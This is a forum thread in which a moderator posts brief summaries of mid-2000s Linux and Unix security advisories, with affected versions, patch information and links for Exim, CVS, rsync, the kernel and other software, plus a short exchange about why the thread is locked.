# All Linux Vulnerabilities



## eddie5659

Hiya

Going to Sticky this for the month, well whats left of it. The May one will take its place 

*CiscoWorks WLSE and Cisco HSE default password and username*

CiscoWorks Wireless LAN Solution Engine (WLSE) manages the Cisco Wireless LAN infrastructure and the Cisco Hosting Solution Engine (HSE) monitors and starts various e-business services in Cisco data centers. WLSE versions 2.0, 2.0.2, and 2.5 and HSE versions 1.7, 1.7.1, 1.7.2, and 1.7.3 are shipped with a default username and password. A remote attacker with knowledge of these credentials could exploit this vulnerability by connecting to an affected device to gain unauthorized access.

Platforms Affected:

Cisco Systems, Inc.: Cisco HSE 1.7 
Cisco Systems, Inc.: Cisco HSE 1.7.1 
Cisco Systems, Inc.: Cisco HSE 1.7.2 
Cisco Systems, Inc.: Cisco HSE 1.7.3 
Cisco Systems, Inc.: CiscoWorks WLSE 2.0 
Cisco Systems, Inc.: CiscoWorks WLSE 2.0.2 
Cisco Systems, Inc.: CiscoWorks WLSE 2.5 
Remedy:

For WLSE:
Install the WLSE-2.x-CSCsa11583-K9.zip patch, as listed in Cisco Security Advisory 50400. See References.

For HSE:
Install the HSE-1.7.x-CSCsa11584.zip patch, as listed in Cisco Security Advisory 50400. See References.

Consequences:

Gain Access

http://xforce.iss.net/xforce/xfdb/15773


----------



## eddie5659

Hiya

Logcheck is a freely available utility program for Unix and Linux-based operating systems. Logcheck could allow a local attacker to launch a symlink attack. Logcheck creates an insecure temporary directory. If this directory is removed, a local attacker could create a symbolic link from a temporary file to any file on the system, which could allow the attacker to overwrite arbitrary files on the system

*Platforms Affected:

Debian Project: Debian Linux 3.0 
Rami Dass: Logcheck Any version 
*

http://xforce.iss.net/xforce/xfdb/15888

Regards

eddie


----------



## eddie5659

Hiya

SquirrelMail is a Web mail system written in PHP4. SquirrelMail is vulnerable to a buffer overflow, caused by a vulnerability in the chpasswd binary. A local attacker can exploit this vulnerability to overflow a buffer and execute arbitrary code on the system with root privileges.

*Platforms Affected:

kernel.org: Linux Any version 
SquirrelMail Project Team: SquirrelMail Any version 
Various: Unix Any version 
*

http://xforce.iss.net/xforce/xfdb/15889

Regards

eddie


----------



## eddie5659

Utempter is a freely available utility that allow users to give non-privileged programs root access for Linux-based operating systems. Utempter could allow a local attacker to launch a symlink attack. A local attacker could exploit this vulnerability to overwrite arbitrary files on the system.

*Platforms Affected:

MandrakeSoft, Inc.: Mandrake Linux 10.0 
MandrakeSoft, Inc.: Mandrake Linux 9.1 
MandrakeSoft, Inc.: Mandrake Linux 9.2 
MandrakeSoft, Inc.: Mandrake Linux Corporate Server 2.1 
MandrakeSoft, Inc.: Mandrake Multi Network Firewall 8.2 
Slackware: Slackware Linux 9.1 
Slackware: Slackware Linux current 
*

http://xforce.iss.net/xforce/xfdb/15904

Regards

eddie


----------



## eddie5659

Linux Kernel versions 2.4.22 through 2.4.25 and 2.6.1 through 2.6.3 are vulnerable to an integer overflow in the ip_setsockopt function, when handling the MCAST_MSFILTER socket option. A local attacker could exploit this vulnerability to overflow a buffer and execute arbitrary code on the system or cause the system to crash.

*Platforms Affected:

kernel.org: Linux kernel 2.4.22 - 2.4.25 
kernel.org: Linux kernel 2.6.1 - 2.6.3 
Trustix: Trustix Secure Enterprise Linux 2 
Trustix: Trustix Secure Linux 2.0 
Trustix: Trustix Secure Linux 2.1 
*

http://xforce.iss.net/xforce/xfdb/15907

Regards

eddis


----------



## eddie5659

mille is a game included in the BSD games package. mille is vulnerable to a stack-based buffer overflow. A local attacker can supply a filename with a length 112 bytes when saving a game to overflow a buffer and execute arbitrary code on the system, with set group id (setgid) 'games' group privileges

*Platforms Affected:

kernel.org: Linux Any version 
Red Hat: mille Any version 
Various: Unix Any version *

http://xforce.iss.net/xforce/xfdb/15915

Regards

eddie


----------



## eddie5659

ArX is a revision control system for Linux-based operating systems. ArX versions prior to 1.0.19 could allow a remote attacker to execute arbitrary commands on a vulnerable client, caused by a format string vulnerability in libneon. A remote attacker, in control of a malicious WebDAV server, could supply a specially-crafted format string to execute arbitrary commands on the victim's computer, once the vulnerable client connects to the malicious server.

*Platforms Affected:

ArX GNU Project: ArX prior to 1.0.19 
kernel.org: Linux Any version 
*

http://xforce.iss.net/xforce/xfdb/15918

Regards

eddie


----------



## eddie5659

Cherokee Web Server is a Web server for Linux and Unix-based operating systems. Cherokee Web Server versions 0.4.16 and earlier could allow a local attacker to execute arbitrary code on the system, caused by a format string vulnerability in the PRINT_ERROR function. A local attacker could exploit this vulnerability by supplying a malicious format string to the PRINT_ERROR function, which could allow the attacker to execute arbitrary commands on the system.

*Platforms Affected:

Alo: Cherokee Web Server 0.4.16 and earlier 
kernel.org: Linux Any version 
Various: Unix Any version *

http://xforce.iss.net/xforce/xfdb/15924

Regards

eddie


----------



## eddie5659

ident2 is a freely available secure server that is an implementation of the ident protocol (RFC1413) for BSD and Linux-based operating systems. ident2 is vulnerable to a buffer overflow in the child_service function, caused by improper bounds checking of user-supplied input. A remote attacker could exploit this vulnerability to overflow a buffer and execute arbitrary code on the system with privileges of the ident2 user.

*Platforms Affected:

Debian Project: Debian Linux 3.0 
Michael Bacarella: ident2 Any version *

http://xforce.iss.net/xforce/xfdb/15938

Regards

eddie


----------



## eddie5659

eXtremail is a free pop3/smtp mail server for Unix. eXtremail version 1.5.9 is vulnerable to a format string attack, caused by improper filtering of user-supplied input by the logging functions. A remote attacker could supply specially-crafted format strings to commands, such as SMTP, POP and IMAP, to cause a denial of service and gain root privileges on the system.

*Platforms Affected:

eXtremail: eXtremail 1.5.9 
Various: Unix Any version *

http://xforce.iss.net/xforce/xfdb/15977

Regards

eddie


----------



## eddie5659

racoon, which is included in the ipsec-tools and iputils packages in
Portage, does not check the length of ISAKMP headers. Attackers may be
able to craft an ISAKMP header of sufficient length to consume all
available system resoources, causing a Denial of Service.

*Affected packages

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
net-firewall/ipsec-tools < 0.3.1 >= 0.3.1
net-misc/iputils == 021109-r1 == 021109-r3

*

http://www.linuxsecurity.com/advisories/gentoo_advisory-4279.html

Regards

eddie


----------



## eddie5659

Several serious problems have been discovered in the Linux kernel.
This update takes care of Linux 2.4.16 for the ARM architecture. The
Common Vulnerabilities and Exposures project identifies the following
problems that will be fixed with this update:

*Affected packages

kernel-source-2.4.16 kernel-patch-2.4.16-arm kernel-image-2.4.16-lart kernel-image-2.4.16-netwinder kernel-image-2.4.16-riscpc
*

http://www.linuxsecurity.com/advisories/debian_advisory-4280.html

Regards

eddie


----------



## eddie5659

A vulnerability has been found in the Linux kernel in the ip_setsockopt() 
function code. There is an exploitable integer overflow inside the code 
handling the MCAST_MSFILTER socket option in the IP_MSFILTER_SIZE macro 
calculation. This issue is present in both 2.4 (2.4.25) and 2.6 kernels.

There is a minor issue with the static buffer in 2.4 kernel's panic() 
function. Although it's a possibly buffer overflow, it most like not 
exploitable due to the nature of panic().

*Affected versions

10.0, 9.1, 9.2, Corporate Server 2.1,
Multi Network Firewall 8.2

*

http://www.linuxsecurity.com/advisories/mandrake_advisory-4281.html

Regards

eddie


----------



## eddie5659

There are multiple format string vulnerabilities in the SSMTP package,
which may allow an attacker to run arbitrary code with ssmtp's
privileges (potentially root).

*Affected packages

net-mail/ssmtp

<= 2.60.4-r2

*

http://www.linuxsecurity.com/advisories/gentoo_advisory-4282.html

Regards

eddie


----------



## eddie5659

Multiple remote vulnerabilities have been found in the LCDd server,
allowing execution of arbitrary code with the rights of the LCDd user

*Affected packages

app-misc/lcdproc <= 0.4.4-r1 *

http://www.linuxsecurity.com/advisories/gentoo_advisory-4283.html

Regards

eddie


----------



## eddie5659

Several vulnerabilities have been found in xine-ui and xine-lib,
potentially allowing an attacker to overwrite files with the rights of
the user.

*Affected packages

media-video/xine-ui <= 0.9.23-r1 
media-libs/xine-lib <= 1_rc3-r2

affected packages on all of their supported architectures

*

http://www.linuxsecurity.com/advisories/gentoo_advisory-4284.html

Regards

eddie


----------



## eddie5659

EnGarde Secure Linux is an enterprise class Linux platform engineered
to enable corporations to quickly and cost-effectively build a complete
and secure Internet presence while preventing Internet threats.

This update includes Serial ATA (SATA) support, updated netfilter GRE
and PPTP conntrack/NAT helpers, and a new 'forcedeth' Ethernet driver
for nForce2 Ethernet support.

*Affected Software

EnGarde Secure Community 2
EnGarde Secure Professional v1.5
*

http://www.linuxsecurity.com/advisories/engarde_advisory-4285.html

Regards

eddie


----------



## eddie5659

Hiya

This thread will be updated monthly with all the previous months. A current month will be stickied at the top 

eddie


----------



## eddie5659

Midnight Commander (mc) is a file management tool for Unix. Midnight Commander version 4.x is vulnerable to a format string attack.

*Platforms Affected:

Debian Project: Debian Linux 3.0 
GNOME Project: Midnight Commander 4.x 
kernel.org: Linux Any version 
Various: Unix Any version 
*

http://xforce.iss.net/xforce/xfdb/16021

Regards

eddie


----------



## eddie5659

rsync is an open-source file synchronization and transfer utility for Linux available under the GNU General Public License (GPL). rsync versions prior to 2.6.1 could allow a remote attacker to write files outside of the directory. When running non-read-only rsync without enabling chroot, a remote attacker can send a path to the rsync daemon to write files to directories outside a module's path.

*Platforms Affected:

GNU Project: rsync prior to 2.6.1 
kernel.org: Linux Any version 
*

http://xforce.iss.net/xforce/xfdb/16014

Regards

eddie


----------



## eddie5659

LHA is a compression and archival utility for LHarc format archives for Linux and Unix-based operating systems. LHA could allow a remote attacker to traverse directories on the system. A remote attacker could send a specially-crafted filename or directory name to LHA to traverse directories and view arbitrary files on the system.

*Platforms Affected:

kernel.org: Linux Any version 
Red Hat, Inc.: Red Hat Linux 9 
Tsugio Okamoto: LHA Any version 
Various: Unix Any version *

http://xforce.iss.net/xforce/xfdb/16013

Regards

eddie


----------



## eddie5659

LHA is a compression and archival utility for LHarc format archives for Linux and Unix-based operating systems. LHA is vulnerable to two buffer overflows, caused by improper bounds checking. A remote attacker could create a specially-crafted LHA archive to overflow the buffers and execute arbitrary code on the victim's system, once the victim tests or extracts the archive.

*Platforms Affected:

kernel.org: Linux Any version 
Red Hat, Inc.: Red Hat Linux 9 
Tsugio Okamoto: LHA Any version 
Various: Unix Any version 
*

http://xforce.iss.net/xforce/xfdb/16012

Regards

eddie


----------



## eddie5659

Exim, developed by the University of Cambridge, is an open-source Mail Transfer Agent for various Unix platforms. Exim versions 3.35 and 4.32 are vulnerable to a stack-based buffer overflow, caused by improper bounds checking. If the verify = header_syntax setting is enabled in the exim.conf configuration file, which is not the default setting, a remote attacker could exploit this vulnerability to overflow a buffer and possibly execute arbitrary code on the vulnerable system.

*Platforms Affected:

Cambridge University: Exim 3.35 
Cambridge University: Exim 4.32 
Various: Unix Any version *

http://xforce.iss.net/xforce/xfdb/16079

Regards

eddie


----------



## eddie5659

Exim, developed by the University of Cambridge, is an open-source Mail Transfer Agent for various Unix platforms. Exim versions 3.35 and 4.32 are vulnerable to a stack-based buffer overflow, caused by improper bounds checking. If the headers_check_syntax setting is enabled in the exim.conf configuration file, which is not the default setting, a remote attacker could exploit this vulnerability to overflow a buffer and possibly execute arbitrary code on the vulnerable system.

*Platforms Affected:

Cambridge University: Exim 3.35 
Cambridge University: Exim 4.32 
Debian Project: Debian Linux 3.0 
Various: Unix Any version 
*

http://xforce.iss.net/xforce/xfdb/16077

Regards

eddie


----------



## eddie5659

Icecast is an open-source mp3 broadcasting program for Microsoft Windows and Unix-based operating systems. Icecast version 2.0.0 is vulnerable to a heap-based buffer overflow. By sending a specially-crafted base64 authorization request, a remote attacker could overflow a buffer and possibly execute arbitrary code on the system or cause the system to crash.

*Platforms Affected:

Icecast: Icecast 2.0.0 
kernel.org: Linux Any version 
Microsoft Corporation: Windows Any version 
*

http://xforce.iss.net/xforce/xfdb/16103

Regards

eddie


----------



## eddie5659

Two stack-based buffer overflows and two directory traversal problems
have been found in LHa. These vulnerabilities can be used to execute
arbitrary code or as a denial of service attack.

*Affected packages

app-arch/lha <= 114i-r1

*

http://www.linuxsecurity.com/advisories/gentoo_advisory-4313.html

Regards

eddie


----------



## eddie5659

There are multiple format string vulnerabilities in libneon which may
allow a malicious WebDAV server to execute arbitrary code

*Affected packages

net-misc/neon <= 0.24.4 *

http://www.linuxsecurity.com/advisories/gentoo_advisory-4314.html

Regards

eddie


----------



## eddie5659

Some versions of Heimdal do not perform appropriate checking of the
`transited' field.

*Affects

FreeBSD 4 with Kerberos 5 installed, and FreeBSD 5

*

http://www.linuxsecurity.com/advisories/freebsd_advisory-4315.html

Regards

eddie


----------



## eddie5659

An input validation error was discovered in the k5admind code that
handles the framing of Kerberos 4 compatibility administration
requests. The code assumed that the length given in the framing was
always two or more bytes. Smaller lengths will cause k5admind to read
an arbitrary amount of data into a minimally-sized buffer on the heap.

Note that this code is not present unless k5admind has been compiled
with Kerberos 4 support. This will occur if a FreeBSD system is
compiled with both of the WITH_KERBEROS4 and WITH_KERBEROS5 build flags.
These flags are never simultaneously set during the FreeBSD binary
release process; consequently, binary installs of FreeBSD (even with
Kerberos support installed) are not affected

*Affects

FreeBSD 4 systems built with both Kerberos 4 and Kerberos 5.
FreeBSD 5 systems prior to 5.1 built with both Kerberos 4 and
Kerberos 5.

*

http://www.linuxsecurity.com/advisories/freebsd_advisory-4316.html

Regards

eddie


----------



## eddie5659

Several buffer overflows, several temporary file creation
vulnerabilities, and one format string vulnerability have been
discovered in Midnight Commander.

* Affects

Midnight Commander v 4.6.0

*

http://www.linuxsecurity.com/advisories/fedora_advisory-4317.html

Regards

eddie


----------



## eddie5659

Updated OpenSSL packages that fix remote denial of service vulnerabilities 
are now available.

*Relevent releases/architectures:

Red Hat Linux 7.2 - i386 i686
Red Hat Linux 7.3 - i386 i686
Red Hat Linux 8.0 - i386 i686
*

http://www.linuxsecurity.com/advisories/fedora_advisory-4318.html

Regards

eddie


----------



## eddie5659

A vulnerability was discovered in rsync, a file transfer program,
whereby a remote user could cause an rsync daemon to write files
outside of the intended directory tree. This vulnerability is not
exploitable when the daemon is configured with the 'chroot' option

* For the current stable distribution (woody) this problem has been
fixed in version 2.5.5-0.4.

For the unstable distribution (sid), this problem has been fixed in
version 2.6.1-1.

*

http://www.linuxsecurity.com/advisories/debian_advisory-4319.html

Regards

eddie


----------



## eddie5659

Tatsuya Kino****a discovered a vulnerability in flim, an emacs library
for working with internet messages, where temporary files were created
without taking appropriate precautions. This vulnerability could
potentially be exploited by a local user to overwrite files with the
privileges of the user running emacs. the 'chroot' option.

*For the current stable distribution (woody) this problem has been
fixed in version 1.14.3-9woody1.

For the unstable distribution (sid), this problem will be fixed soon.

*

http://www.linuxsecurity.com/advisories/debian_advisory-4320.html

Regards

eddie


----------



## eddie5659

Georgi Guninski discovered two stack-based buffer overflows. They can
not be exploited with the default configuration from the Debian
system, though. The Common Vulnerabilities and Exposures project
identifies the following problems that are fixed with this update

* For the stable distribution (woody) these problems have been fixed in
version 3.35-1woody3.

For the unstable distribution (sid) these problems have been fixed in
version 3.36-11 for exim 3 and in version 4.33-1 for exim 4.
*

http://www.linuxsecurity.com/advisories/debian_advisory-4321.html

Regards

eddie


----------



## eddie5659

Apache 2 before 2.0.47, and certain versions
of mod_ssl for Apache 1.3, do not properly handle "certain
sequences of per-directory re-negotiations and the
SSLCipherSuite directive being used to upgrade from a weak
cipher suite to a strong one," which could cause Apache
to use the weak cipher suite.

Multiple stack-based buffer overflows in 
mod_alias and mod_rewrite for Apache before 1.3.29 may allow 
attackers to create configuration files to cause a denial of 
service or execute arbitrary code via a regular expression
with more than 9 captures

*Vulnerable Supported Versions

UnixWare 7.1.3 Apache distribution
Open UNIX 8.0.0 Apache distribution
UnixWare 7.1.1 Apache distribution

*

http://www.linuxsecurity.com/advisories/caldera_advisory-4323.html

Regards

eddie


----------



## eddie5659

cPanel is a Web-based management interface for Linux-based operating systems. cPanel version 9.3.0-R5 and possibly earlier versions could allow a remote authenticated attacker to obtain sensitive information, including usernames and passwords. The Fantastico addon creates database names based on usernames and users that have read access to the /var/lib/mysql directory, which contains the database names. A remote authenticated attacker could use exploit this vulnerability by using brute-force techniques to obtain user?s passwords to gain access to other user's accounts.

*Platforms Affected:

cPanel Inc.: cPanel 9.3.0-R5 
kernel.org: Linux Any version 
Various: Unix Any version 
*

http://xforce.iss.net/xforce/xfdb/16197

Regards

eddie


----------



## eddie5659

CVS (Concurrent Versions System) is an open-source source code management and distribution system available for most Linux and Unix-based operating systems. CVS feature versions 1.12.7 and earlier and stable versions 1.11.15 and earlier are vulnerable to a heap overflow, caused by improper handling of entry lines when applying modified and unchanged flags. A remote attacker could send specially-crafted commands to overflow a buffer and execute arbitrary code on the system.

*Platforms Affected:

CVS, Derek Price : CVS (Concurrent Versions System) 1.11.15 and earlier 
CVS, Derek Price : CVS (Concurrent Versions System) 1.12.7 and earlier 
Debian Project: Debian Linux 3.0 
FreeBSD Project: FreeBSD Any version 
kernel.org: Linux Any version 
Red Hat, Inc.: Red Hat Advanced Workstation 2.1 
Red Hat, Inc.: Red Hat Enterprise Linux 2.1AS 
Red Hat, Inc.: Red Hat Enterprise Linux 2.1ES 
Red Hat, Inc.: Red Hat Enterprise Linux 2.1WS 
Red Hat, Inc.: Red Hat Enterprise Linux 3AS 
Red Hat, Inc.: Red Hat Enterprise Linux 3ES 
Red Hat, Inc.: Red Hat Enterprise Linux 3WS 
Red Hat, Inc.: Red Hat Linux Desktop 3 
Various: Unix Any version 
*

http://xforce.iss.net/xforce/xfdb/16193

Regards

eddie


----------



## eddie5659

Subversion is a version control project for all Linux and Unix-based operating systems. Subversion versions 1.0.2 and prior could allow a remote attacker to execute arbitrary code on the system, caused by a vulnerability when parsing the date string. A remote attacker could send a specially-crafted DAV2 REPORT query or get-dated-rev svn-protocol command to cause a stack-based buffer overflow. A remote attacker could exploit this vulnerability to execute arbitrary code on the system with privileges of the victim.

*Platforms Affected:

kernel.org: Linux Any version 
Tigris.org: Subversion 1.0.2 and prior 
Various: Unix Any version 
*

http://xforce.iss.net/xforce/xfdb/16191

Regards

eddie


----------



## eddie5659

neon is a freely available HTTP and WebDAV library for Unix and Linux-based operating systems. neon versions 0.24.5 and earlier are vulnerable to a heap-based buffer overflow in the date parsing function of the neon library. A remote attacker can supply a specially-crafted date string to the ne_rfc1036_parse function to overflow a buffer and possibly execute arbitrary code on the system, depending on how the application uses the neon library.

*Platforms Affected:

Debian Project: Debian Linux 3.0 
Joe Orton : neon 0.24.5 and earlier 
kernel.org: Linux Any version 
Various: Unix Any version *

http://xforce.iss.net/xforce/xfdb/16192

Regards

eddie


----------



## EdwardBrown

Maybe it's just me, but I don't understand. Where is the "Microsoft Vulnerabilities" thread?


----------



## eddie5659

Hiya

Its here:

http://forums.techguy.org/t195532.html

And the older ones are here:

http://forums.techguy.org/t220750.html

Regards

eddie


----------



## EdwardBrown

Thank you, eddie. Why is that thread closed, though? It's as if somebody is trying to keep Linux users more informed than Microsoft users. Why are Linux users getting special treatment?


----------



## eddie5659

I keep that one closed, as some people tend to tag on and ask the questions that should be in their respective threads. I suppose I should close the one in Linux, but as I'm revising this month, I'll update it once again, and keep it closed.

Some of the smaller vulnerabilites, like Norton etc, I place in their forums such as Software. These aren't locked, as many have updates about that particular problem themselves 

eddie


----------



## eddie5659

log2mail is a log file analyzer, developed by Michael Krax, for Linux-based operating systems. log2mail versions prior to 0.2.5.2 for Debian Linux 3.0 and possibly other Linux distributions could allow a local attacker to execute arbitrary code on the system, caused by a format string vulnerability. A local attacker could log a specially-crafted message using the syslog function to execute arbitrary code on the system with privileges of the log2mail process.

*Platforms Affected:

Debian Project: Debian Linux 3.0 
Michael Krax: log2mail prior to 0.2.5.2*

http://xforce.iss.net/xforce/xfdb/16311

Regards

eddie


----------



## eddie5659

Slackware Linux versions 8.1, 9.0, and 9.1 could allow a local attacker to gain elevated privileges on the system, caused by a vulnerability in the PHP package. A local attacker could place a malicious shared library in the /tmp directory to execute arbitrary code on the system or cause PHP to crash.

*Platforms Affected:

Slackware: Slackware Linux 8.1 
Slackware: Slackware Linux 9.0 
Slackware: Slackware Linux 9.1 *

http://xforce.iss.net/xforce/xfdb/16310

Regards

eddie


----------



## eddie5659

l2tpd is a layer 2 tunneling protocol daemon for Linux. l2tpd version 0.64 is vulnerable to a buffer overflow in the write_packet function in the control.c file, caused by improper bounds checking of user-supplied input. By sending a specially-crafted packet, a remote attacker could overflow a buffer and possibly execute arbitrary code on the system.

*Platforms Affected:

kernel.org: Linux Any version 
l2tpd Project: l2tpd 0.64 
*

http://xforce.iss.net/xforce/xfdb/16326

Regards

eddie


----------



## eddie5659

cPanel is a Web-based management interface for Linux-based operating systems. cPanel could allow a remote authenticated administrator to delete customer information from accounts that are not the administrator's. A remote authenticated administrator could use a specially-crafted cookie and the /scripts/killacct script to delete DNS information.

*Platforms Affected:

cPanel Inc.: cPanel any version 
kernel.org: Linux Any version 
Various: Unix Any version 
*

http://xforce.iss.net/xforce/xfdb/16325

Regards

eddie


----------



## eddie5659

Crafty Syntax Live Help (CSLH) is an open source PHP-based live help support chat program for Linux platforms. CSLH versions prior to 2.7.4 are vulnerable to cross-site scripting, caused by improper filtering of user-supplied input. A remote attacker could embed malicious script within the name field of a livehelp or a chat session, which would be executed in the victim's Web browser within the security context of the hosting site, once the session is processed. An attacker could use this vulnerability to steal a victim's cookie-based authentication credentials, obtain other sensitive information or launch further attacks against the affected system.

*Platforms Affected:

kernel.org: Linux Any version 
Open Source: Crafty Syntax Live Help (CSLH) prior to 2.7.4 
*

http://xforce.iss.net/xforce/xfdb/16321

Regards

eddie


----------



## eddie5659

Multiple buffer overflows exist in the krb5_aname_to_localname()
library function that if exploited could lead to unauthorized root
privileges. In order to exploit this flaw, an attacker must first
successfully authenticate to a vulnerable service, which must be
configured to enable the explicit mapping or rules-based mapping
functionality of krb5_aname_to_localname, which is not a default
configuration

*Affected versions:

10.0, 9.1, 9.2, Corporate Server 2.1,
Multi Network Firewall 8.2

*

http://www.linuxsecurity.com/advisories/mandrake_advisory-4452.html

Regards

eddie


----------



## eddie5659

Mdkonline as shipped in 10.0 has some issues comparing squid release
versions. This package is a mandatory upgrade to get fully functional
Mandrake Online services.

*Updated Packages:

Mandrakelinux 10.0:
42a4bfe7e7558738b1e0e7530434966c 10.0/RPMS/mdkonline-1.1-2.1.100mdk.noarch.rpm
ddf9aa3ee5ac54824ed4a197629866e7 10.0/SRPMS/mdkonline-1.1-2.1.100mdk.src.rpm

Mandrakelinux 10.0/AMD64:
f42516ed24e578633f629571be7f757e amd64/10.0/RPMS/mdkonline-1.1-2.1.100mdk.noarch.rpm
ddf9aa3ee5ac54824ed4a197629866e7 amd64/10.0/SRPMS/mdkonline-1.1-2.1.100mdk.src.rpm
*

http://www.linuxsecurity.com/advisories/mandrake_advisory-4453.html

Regards

eddie


----------



## eddie5659

A vulnerability exists in squid's NTLM authentication helper. This
buffer overflow can be exploited by a remote attacker by sending an
overly long password, thus overflowing the buffer and granting the
ability to execute arbitrary code. This can only be exploited,
however, if NTLM authentication is used. NTLM authentication is built
by default in Mandrakelinux packages, but is not enabled in the
default configuration.

*The vulnerability exists in 2.5.*-STABLE and 3.*-PRE. The provided
packages are patched to fix this problem.
*

http://www.linuxsecurity.com/advisories/mandrake_advisory-4455.html

Regards

eddie


----------



## eddie5659

Geoffrey Lee discovered a problem with the ksymoops-gznm script
distributed with Mandrakelinux. The script fails to do proper checking
when copying a file to the /tmp directory. Because of this, a local
attacker can setup a symlink to point to a file that they do not have
permission to remove. The problem is difficult to exploit because
someone with root privileges needs to run ksymoops on a particular
module for which a symlink for the same filename already exists.

*Affected versions: 10.0, 9.1, 9.2, Corporate Server 2.1
*

http://www.linuxsecurity.com/advisories/mandrake_advisory-4456.html

Regards

eddie


----------



## eddie5659

Mailman contains a bug allowing 3rd parties to retrieve member
passwords.

*Affected packages

Package / Vulnerable / Unaffected

net-mail/mailman < 2.1.5 >= 2.1.5

*

http://www.linuxsecurity.com/advisories/gentoo_advisory-4457.html

Regards

eddie


----------



## eddie5659

A bug in mod_ssl may allow a remote attacker to execute remote code
when Apache is configured a certain way.

*Affected packages

Package / Vulnerable / Unaffected

1 net-www/mod_ssl < 2.8.18 >= 2.8.18
2 net-www/apache <= 2.0.49-r2 < 2.0
>= 2.0.49-r3
-------------------------------------------------------------------
2 affected packages on all of their supported architectures.
-------------------------------------------------------------------

*

http://www.linuxsecurity.com/advisories/gentoo_advisory-4458.html

Regards

eddie


----------



## eddie5659

Several serious new vulnerabilities have been found in CVS, which may
allow an attacker to remotely compromise a CVS server.

* Affected packages

Package / Vulnerable / Unaffected

dev-util/cvs <= 1.11.16-r1 >= 1.11.17

*

http://www.linuxsecurity.com/advisories/gentoo_advisory-4459.html

Regards

eddie


----------



## eddie5659

An SQL injection flaw was found in SquirrelMail version 1.4.2 and
earlier. If SquirrelMail is configured to store user addressbooks in
the database, a remote attacker could use this flaw to execute
arbitrary SQL statements. The Common Vulnerabilities and Exposures
project has assigned the name CAN-2004-0521 to this issue.

A number of cross-site scripting (XSS) flaws in SquirrelMail version
1.4.2 and earlier could allow remote attackers to execute scripts as
other web users. The Common Vulnerabilities and Exposures project
(cve.mitre.org) has assigned the names CAN-2004-0519 and CAN-2004-0520
to these issues.

http://www.linuxsecurity.com/advisories/fedora_advisory-4460.html

Regards

eddie


----------



## eddie5659

libpng: Jaakko Heinonen reported an old minor security issue that was
not fixed correctly.

mod_php4: New upstream version that fixes several minor issues.

openssl: Added a couple of missing files in the python library.

rsync: Fixed a packaging issue in the rsync package of TSL 1.5

stunnel: Jaakko Heinonen reported another old minor security issue
that was not fixed correctly.

swup: fixed a problem with multiple providers of same resource.
(patch by Omar Kilani)

*Affected versions

Trustix Secure Linux 1.5
Trustix Secure Linux 2.0
Trustix Secure Linux 2.1
Trustix Operating System - Enterprise Server 2

*

http://www.linuxsecurity.com/advisories/trustix_advisory-4511.html

Regards

eddie


----------



## eddie5659

The Dynamic Host Configuration Protocol (DHCP) server is used to
configure clients that dynamically connect to a network (WLAN
hotspots, customer networks, ...).
The CERT informed us about a buffer overflow in the logging code of the
server that can be triggered by a malicious client by supplying multiple
hostnames. The hostname strings are concatenated and copied in a
fixed size buffer without checking the buffer bounds.
Other possible buffer overflow conditions exist in using vsprintf()
instead of vsnprintf(). This behavior can be configured during compile-
time. The dhcp/dhcp-server package coming with SUSE LINUX used the
vulnerable vsprintf() function.

Since SuSE Linux 8.1/SuSE Linux Enterprise Server 8 the DHCP server runs
as non-root user in a chroot jail. This setup limits the impact of a
successful attack.

There is no temporary workaround known.

*Affected products:

8.0, 8.1, 8.2, 9.0, 9.1
SUSE Linux Database Server,
SUSE eMail Server III, 3.1
SUSE Linux Enterprise Server 7, 8
SUSE Linux Firewall on CD/Admin host
SUSE Linux Connectivity Server
SUSE Linux Office Server

*

http://www.linuxsecurity.com/advisories/suse_advisory-4512.html

Regards

eddie


----------



## eddie5659

A vulnerability in how ISC's DHCPD handles syslog messages can allow a
malicious attacker with the ability to send special packets to the
DHCPD listening port to crash the daemon, causing a Denial of Service.
It is also possible that they may be able to execute arbitrary code on
the vulnerable server with the permissions of the user running DHCPD,
which is usually root.

A similar vulnerability also exists in the way ISC's DHCPD makes use
of the vsnprintf() function on system that do not support vsnprintf().
This vulnerability could also be used to execute arbitrary code and/or
perform a DoS attack. The vsnprintf() statements that have this
problem are defined after the vulnerable code noted above, which would
trigger the previous problem rather than this one.

*Affected versions: 10.0, 9.2
*

http://www.linuxsecurity.com/advisories/mandrake_advisory-4513.html

Regards

eddie


----------



## eddie5659

A vulnerability in the e1000 driver for the Linux kernel 2.4.26 and
earlier was discovered by Chris Wright. The e1000 driver does not
properly reset memory or restrict the maximum length of a data
structure, which can allow a local user to read portions of kernel
memory (CAN-2004-0535).

A vulnerability was also discovered in the kernel were a certain C
program would trigger a floating point exception that would crash the
kernel. This vulnerability can only be triggered locally by users with
shell access (CAN-2004-0554).

*Affected versions:

10.0, 9.1, 9.2, Corporate Server 2.1,
Multi Network Firewall 8.2
*

http://www.linuxsecurity.com/advisories/mandrake_advisory-4514.html

Regards

eddie


----------



## eddie5659

A bug in mod_proxy may allow a remote attacker to execute arbitrary
code when Apache is configured a certain way.

*Affected packages

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-www/apache <= 1.3.31-r1 >= 1.3.31-r2

*

http://www.linuxsecurity.com/advisories/gentoo_advisory-4515.html

Regards

eddie


----------



## eddie5659

racoon provided as part of IPsec-Tools fails do proper authentication

*Affected packages

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-firewall/ipsec-tools < 0.3.3 >= 0.3.3

*

http://www.linuxsecurity.com/advisories/gentoo_advisory-4516.html

Regards

eddie


----------



## eddie5659

gzip contain a bug potentially allowing an attacker to execute
arbitrary commands.

*Affected packages

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 app-arch/gzip <= 1.3.3-r3 >= 1.3.3-r4

*

http://www.linuxsecurity.com/advisories/gentoo_advisory-4517.html

Regards

eddie


----------



## eddie5659

There is a vulnerability where a carefully crafted signal sent to the
giFT-FastTrack plugin will cause the giFT daemon to crash

*Affected packages

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-p2p/gift-fasttrack <= 0.8.6 >= 0.8.7

*

http://www.linuxsecurity.com/advisories/gentoo_advisory-4518.html

Regards

eddie


----------



## eddie5659

FreeS/WAN, Openswan, strongSwan and Super-FreeS/WAN contain two bugs
when authenticating PKCS#7 certificates. This could allow an attacker
to authenticate with a fake certificate.

* Affected packages

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-misc/freeswan < 2.04-r1 >= 2.04-r1
== 1.99-r1
